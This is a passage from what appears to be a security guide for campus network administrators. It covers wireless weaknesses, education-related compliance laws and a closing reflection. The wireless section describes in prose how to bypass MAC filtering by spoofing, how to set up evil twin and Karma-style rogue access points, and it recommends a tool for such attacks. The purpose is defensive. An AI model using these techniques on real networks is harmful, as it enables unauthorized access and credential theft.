        Some will recommend using MAC address filtering and turning off  beaconing as a form of authentication. Cloaking of SSID beaconing is not much of a protection since it can be gotten around easily. When a client associates with an access point, it sends the SSID in the clear (even with WEP or WPA turned on). A network card in monitor mode can sniff this out of the air using a passive tool like Kismet (http://www.kismetwireless.net/). I personally am not in favor of using MAC address filtering as it's less flexible, does not offer encryption of the data by itself, and is easy to get around. MAC address filtering alone may keep out the novice, but a knowledgeable attacker will fire up a passive wardriving tool like Kismet and look for valid client MAC addresses as they connect and transmit data. They will then set their wireless card's MAC address to that of a valid client (http://www.irongeek.com/i.php?page=security/changemac).

        Another viable option for attackers is to setup an Evil Twin access point. This amounts to having another SSID out there on hardware the attacker controls with the same name as the legitimate one. How will users know which to attach to? Karma/Jasager style attacks do this one better by listening to probes for preferred networks, then when the evil router sees a probe from a client for any SSID it responds "Hey, that's me, go ahead and connect".  There are a ton of tools working behind the scenes that will let you set up an evil twin or Karma style attack, but I think easy-creds (http://code.google.com/p/easy-creds/) does this better that most from a streamlining of use standpoint.

        One last thing on this subject, you may want to look out for rogue access points that are not necessarily malicious, but still unwanted. A student, staff or faulty member may set up their own access point in a dorm or office, but not lock it down, so anybody can get on the network by using it with no accountability. This can be mitigated by using tools like Kismet to routinely look for rogue access points, scanning subnets for MAC address know to belong to SOHO (Small Office Home Office) networking vendors or possibly your current WiFi infrastructure vendor has something built into their system already to detect rogue access points via a site survey tool. 

Compliance

        This section will need expanding as I'm a tech, not a compliance officer. Compliance != Security, but admins (the suit kind, not the server/network kind) care about compliance because of the possibility of fines or loss of funds, so compliance concerns could be used as a billy-club to get security projects financed. One problem is figuring out what these laws mean from a technical stand point. Saying that "auditing controls" and encryption must be in place tells you little about what you should implement, and I imagine someone could fit the letter of some laws while still breaking the sprit of them (default Windows host logs only and ROT13 for encryption). Then again, I'm not sure we would want law makers deciding the exact technical controls you have to put in place, so maybe vague is better. For now, I'll just give you a survey of the acronym soup that is compliance, and point you towards some laws that may apply to your institution.

PCI DSS (Payment Card Industry Data Security Standard)

        Do you accept credit cards for tuition, meals, activities and the like? Then you fall under PCI DSS and must protect the payment card data.

HIPAA/HITECH (Health Insurance Portability and Accountability Act / Health Information Technology for Economic and Clinical Health Act)

        Do you have a medical or nursing school with real patients and patient data? They you likely have records that fall under the purview of HIPAA/HITECH.

FISMA/FIPS (Federal Information Security Management Act of 2002 /  Federal Information Processing Standards)

        Are you a research institution that receives money from the government for research that may have classified components?

IRB (Institutional Review Board)

        Not sure who all this applies to, but I imagine ethical concerns will pop up with the use of some types of data you may collect.

FERPA (Family Educational Rights and Privacy Act)

        From a security standpoint, FERPA sets rules for the handling of student information. Did your origination have a breach and leak a bunch of student names, Social Security numbers, grades, etc? Then in theory you could have federal funding pulled if you are found negligent. I say in theory, as I can not find a case of funding ever being pulled (email me if you find one). Also, it seems students/parents themselves can't use FERPA to sue the school (http://epic.org/privacy/education/school.html). Now for a less security related discussion of a FERPA feature, but a more ranty one, there is the issue of students being allowed to amend their records. Getting the FPCO's attention is hard, and you have to submit complaints in paper form (I'm guessing to cut back on their workload). Apparently the right to even have your side put in the record has exceptions. To quote from their site, first they say "If, as a result of the hearing, the school still decides not to amend the record, the eligible student has the right to insert a statement in the record setting forth his or her views" but later put in exceptions "Thus, while FERPA affords eligible students the right to seek to amend education records which contain inaccurate information, this right cannot be used to challenge a grade or an individual's opinion, or a substantive decision made by a school about a student." Wait, a student can't put their side in if the record they  have a problem with involves a grade, opinion, or substantive decision (which could possibly mean anything)? So, when would a student ever be allowed to put their side in? Everything I can think of where a school would want to not change a record falls into those categories, so when does a student ever get a chance to have their side of events put in the record as well? Back to security, I remember interviewing once for a security position at a university, and found it interesting that PCI was on their radar but FERPA was not. But then, why should it be if FERPA has no teeth and no one has ever lost money over it?

        Besides the compliance issues listed above (and ones I surely have missed), check to see if your state has any specific breach notification laws in your jurisdiction.

Conclusion

        In closing let me say that an information security professional in a campus environment is fighting a losing battle from the start. By their very nature university and library systems are more open and accessible than corporate systems and must remain so to be useful to the patrons, students, staff, and faculty who use them. Also, having a certain class of users with excessive power for their competency level, a sense of entitlement, and that can't be fired because of tenure also complicates the using of the stick approach. Even though you can't make your campus' network completely secure and still useable, you can do your best to limit the efforts of the casual attacker. The less casual ones you can hire.

Special thanks to Nancy, Spyrus, Tiger Shark, TheHorse13 and HTRegz for reviewing older versions of this article.

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast